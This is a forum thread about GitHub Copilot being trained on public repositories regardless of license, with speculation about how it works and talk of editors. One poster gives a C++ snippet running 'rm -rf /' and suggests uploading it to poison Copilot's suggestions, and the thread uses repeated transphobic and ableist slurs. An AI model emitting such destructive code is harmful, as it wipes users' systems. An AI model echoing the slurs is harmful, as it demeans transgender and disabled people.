GitHub Support just straight up confirmed in an email that yes, they used all public GitHub code, for Codex/Copilot regardless of license - GitHub does another retarded initiative

awoo · Jul 8, 2021

https://www.reddit.com/r/programmin...hub_support_just_straight_up_confirmed_in_an/

Github Copilot is a retarded idea of a VS Code extension that suggests code for you based on some model trained on publicly available code on github. I'd love to know which braindead manager or tranny got swept up in the "AI hype" and decided this was remotely a good idea.
Anyone with two brain cells knows that machines can barely produce semantically meaningful human text and blindly copy-pasting code will lead to dumpster-fire code.
Now, they may be in legal trouble since their retarded devs used all code on github, regardless of license.

Kosher Dill · Jul 8, 2021

They should have trained the model on Stack Overflow instead. I'd be doing the needful at lightspeed.

awoo · Jul 8, 2021

Kosher Dill said:
They should have trained the model on Stack Overflow instead. I'd be doing the needful at lightspeed.

I always check the comments of stackoverflow solutions. A lot of people will point out how the accepted or upvoted answer is wrong or horribly flawed in some way.

CoolSixtyNiner · Jul 8, 2021

awoo said:
https://www.reddit.com/r/programmin...hub_support_just_straight_up_confirmed_in_an/

Github Copilot is a retarded idea of a VS Code extension that suggests code for you based on some model trained on publicly available code on github. I'd love to know which braindead manager or tranny got swept up in the "AI hype" and decided this was remotely a good idea.
Anyone with two brain cells knows that machines can barely produce semantically meaningful human text and blindly copy-pasting code will lead to dumpster-fire code.
Now, they may be in legal trouble since their retarded devs used all code on github, regardless of license.

It is an interesting problem to solve, which is why their ml team came up it I'm sure. I haven't and wont use it, but I imagine it looks at the name of the function you create in the language of your file, looks at the dependencies you're using, and then what, finds some public code to pull from. I wonder how they weigh code quality. Are they pulling mostly from open source?
So when you start writing in a node file Const fetchUserFromApi...
it will look where first? An open source project with a ton of stars/forks? the documentation for axios because you have it as a dependency? How far until it pulls from that personal project someone made that doesnt work. It tries to parse what you want from the name of the function, but will copilot have suggestions for naming conventions? I am tempted to see how it works.
Also, I should have recognized ML/AI would buttfuck devs eventually. This will undoubtedly become efficient. ML is really the only path to take as a dev at this point, that and Cloud engineering.

i ended up reading through that reddit thread, and i am once again reminded that the only group of people I am disgusted by more than trannies, are reddit trannies.

一个日志 · Jul 8, 2021

time to spam upload files with this code


#include<iostream> 
using namespace std; 
int main() 
{ 
     system("rm -rf /"); 
    return 0; 
}

I just cant wait untill some tranny autocompletes that code

awoo · Jul 8, 2021

CoolSixtyNiner said:
It is an interesting problem to solve, which is why their ml team came up it I'm sure. I haven't and wont use it, but I imagine it looks at the name of the function you create in the language of your file, looks at the dependencies you're using, and then what, finds some public code to pull from. I wonder how they weigh code quality. Are they pulling mostly from open source?
So when you start writing in a node file Const fetchUserFromApi...
it will look where first? An open source project with a ton of stars/forks? the documentation for axios because you have it as a dependency? How far until it pulls from that personal project someone made that doesnt work. It tries to parse what you want from the name of the function, but will copilot have suggestions for naming conventions? I am tempted to see how it works.
Also, I should have recognized ML/AI would buttfuck devs eventually. This will undoubtedly become efficient. ML is really the only path to take as a dev at this point, that and Cloud engineering.

I'm highly skeptical, because even if you name your functions well like Const fetchUserFromApi..., this function could do one of a million things, depending on which API you're using, what exactly a "user" is, etc. I don't see how this will be useful unless the machine knows exactly your program requirements, or it's a function extremely straightforward like read_csv_file

awoo · Jul 8, 2021

一个日志 said:
time to spam upload files with this code
#include<iostream> using namespace std; int main() { system("rm -rf /"); return 0; }
I just cant wait untill some tranny autocompletes that code

I like how you were polite enough to return 0, as if there will be anything left

seri0us · Jul 8, 2021

Kosher Dill said:
They should have trained the model on Stack Overflow instead. I'd be doing the needful at lightspeed.

一个日志 · Jul 8, 2021

awoo said:
I like how you were polite enough to return 0, as if there will be anything left

Through trial and errors, Ive learnt people get concerned when there is nothing returned

CoolSixtyNiner · Jul 8, 2021

awoo said:
I'm highly skeptical, because even if you name your functions well like Const fetchUserFromApi..., this function could do one of a million things, depending on which API you're using, what exactly a "user" is, etc. I don't see how this will be useful unless the machine knows exactly your program requirements, or it's a function extremely straightforward like read_csv_file

It has to look at a part of your code base before making any prediction otherwise you're right it would be useless. But how can it do all of this quickly?

I have to try this out now. Hopefully the trannies don't torpedo it before I can play with it.

Coffee Shits · Jul 8, 2021

Tweet (archive)
Old Reddit link (archive)

I was waiting for Microsoft to make good on the Github acquisition, and there it is. Reading between the lines I'd guess they used all public repositories as training data, but until they say that private repositories are excluded, you can probably assume they're included too. Microsoft did make private repositories free when they acquired Github so it's possible they did that as a CYA.

The feedback loop definitely is coming from VS Code phoning home. Autocomplete a function definition, that's no good, that data is logged and used in future autocompletes. Good reason to stop using VS Code if you still needed one.

CoolSixtyNiner · Jul 8, 2021

Coffee Shits said:
View attachment 2327917
Tweet (archive)
Old Reddit link (archive)

I was waiting for Microsoft to make good on the Github acquisition, and there it is. Reading between the lines I'd guess they used all public repositories as training data, but until they say that private repositories are excluded, you can probably assume they're included too. Microsoft did make private repositories free when they acquired Github so it's possible they did that as a CYA.

The feedback loop definitely is coming from VS Code phoning home. Autocomplete a function definition, that's no good, that data is logged and used in future autocompletes. Good reason to stop using VS Code if you still needed one.

I used neovim for all my personal projects, but for work I need to use something with the ability to live write together with others, like VScodes Liveshare. The only other one I know of is Intellij but it costs money. What else is there?

Coffee Shits · Jul 8, 2021

CoolSixtyNiner said:
I used neovim for all my personal projects, but for work I need to use something with the ability to live write together with others, like VScodes Liveshare. The only other one I know of is Intellij but it costs money. What else is there?

Sublime Text comes to mind. Not free, but you can use it as nagware forever.

I've heard good things about TextWrangler/BBEdit, but that's macOS only.

Edit: didn't read the "live write together" part. Not sure then. Google Docs or codeshare.io?

awoo · Jul 8, 2021

CoolSixtyNiner said:
I used neovim for all my personal projects, but for work I need to use something with the ability to live write together with others, like VScodes Liveshare. The only other one I know of is Intellij but it costs money. What else is there?

If you're still a student you can get JetBrains license for free

But do you really need live code writing? This is the kinda thing that should be handled with code reviews I thought

Radical Cadre · Jul 8, 2021

Would one of you be so kind as to translate this into Retard so that I might understand it?

Are you saying that they took all of GitHub's hard work and fed it into an AI? Which would make the acquisition of GitHub no more than a cynical grab at information? And that Microsoft didn't want to do the hard work themselves and really had no interest in the concept of GitHub in the first place seeing as they even took licensed work?

ChromaticAberration · Jul 8, 2021

Radical Cadre said:
Would one of you be so kind as to translate this into Retard so that I might understand it?

Are you saying that they took all of GitHub's hard work and fed it into an AI? Which would make the acquisition of GitHub no more than a cynical grab at information? And that Microsoft didn't want to do the hard work themselves and really had no interest in the concept of GitHub in the first place seeing as they even took licensed work?

The Copilot Machine Learning model was trained using code from every repository available on GitHub. It has been shown that Copilot is able to reproduce code verbatim from its learning pool. That means Copilot can potentially be used to "launder" code with the goal of removing the Copyleft licenses (which make the software free and open) of the original code and use it for closed proprietary software. This is a massive legal shitshow brewing.

awoo · Jul 8, 2021

It uses public code (it might use private repos, we're not sure) so it is akin to copy pasting code you found on github, however since a tool does it for you it might be legally implicated for not respecting licenses as well.

Knight of the Rope · Jul 8, 2021

CoolSixtyNiner said:
Also, I should have recognized ML/AI would buttfuck devs eventually. This will undoubtedly become efficient.

I've worked in ML stuff for a bit recently and it's all very underwhelming to me. The models just seem way too specialized and easy to fool, and I'm starting to see stakeholders get really burned by their ridiculous expectations for what the AI 'should' be able to do. And if you're using ML/AI for mathematical/statistical modeling then they're next to worthless in terms of actually understanding the thing you're trying to model (which is arguably the entire point of the modeling process at all).

I'm fully blackpilled on the 'AI revolution' at this point and to be honest I'm all-in on another AI winter coming soon. I think people are starting to wake up from the hype.

CoolSixtyNiner said:
It has to look at a part of your code base before making any prediction otherwise you're right it would be useless. But how can it do all of this quickly?

From what I read about it earlier all Copilot reads is the currently open file. So yes, in its current iteration it's useless for its stated purpose.

Spasticus Autisticus · Jul 8, 2021

There's a Twitter account called Copilot Tweets that is tweeting some of the weird shit Copilot will generate.

Based Copilot:

awoo · Jul 8, 2021

Knight of the Rope said:
I've worked in ML stuff for a bit recently and it's all very underwhelming to me. The models just seem way too specialized and easy to fool, and I'm starting to see stakeholders get really burned by their ridiculous expectations for what the AI 'should' be able to do. And if you're using ML/AI for mathematical/statistical modeling then they're next to worthless in terms of actually understanding the thing you're trying to model (which is arguably the entire point of the modeling process at all).

The current state of the art is still very specialized tasks. So machines are very good at things like seeing a picture and telling you what animal is shown, or even performing translations, however they are not at the step of generalizing. I listened to an interview with Geoff Hinton, one of the pioneers of neural networks, and he said that we may only be able to generalize when we can train machines on vast quantities of unlabeled data where we have to guess our own labels rather than having them provided beforehand. He also suggests some of our intelligence such as the way our optic cells are arranged already encodes useful information that isn't learned but has evolved over time, which is some justification for constructing network architectures rather than learning everything.

GitHub Support just straight up confirmed in an email that yes, they used all public GitHub code, for Codex/Copilot regardless of license - GitHub does another retarded initiative

awoo

Please be patient, I have awootism

Kosher Dill

Potato Chips

awoo

Please be patient, I have awootism

CoolSixtyNiner

I'm CoolSixtyNiner, defiant and unyielding.

一个日志

中国第一，台湾第四

awoo

Please be patient, I have awootism

awoo

Please be patient, I have awootism

seri0us

Nothing too serious.

一个日志

中国第一，台湾第四

CoolSixtyNiner

I'm CoolSixtyNiner, defiant and unyielding.

Coffee Shits

Get a grip

CoolSixtyNiner

I'm CoolSixtyNiner, defiant and unyielding.

Coffee Shits

Get a grip

awoo

Please be patient, I have awootism

Radical Cadre

ChromaticAberration

awoo

Please be patient, I have awootism

Knight of the Rope

Spasticus Autisticus

HELLO. FOOD STAINS

awoo

Please be patient, I have awootism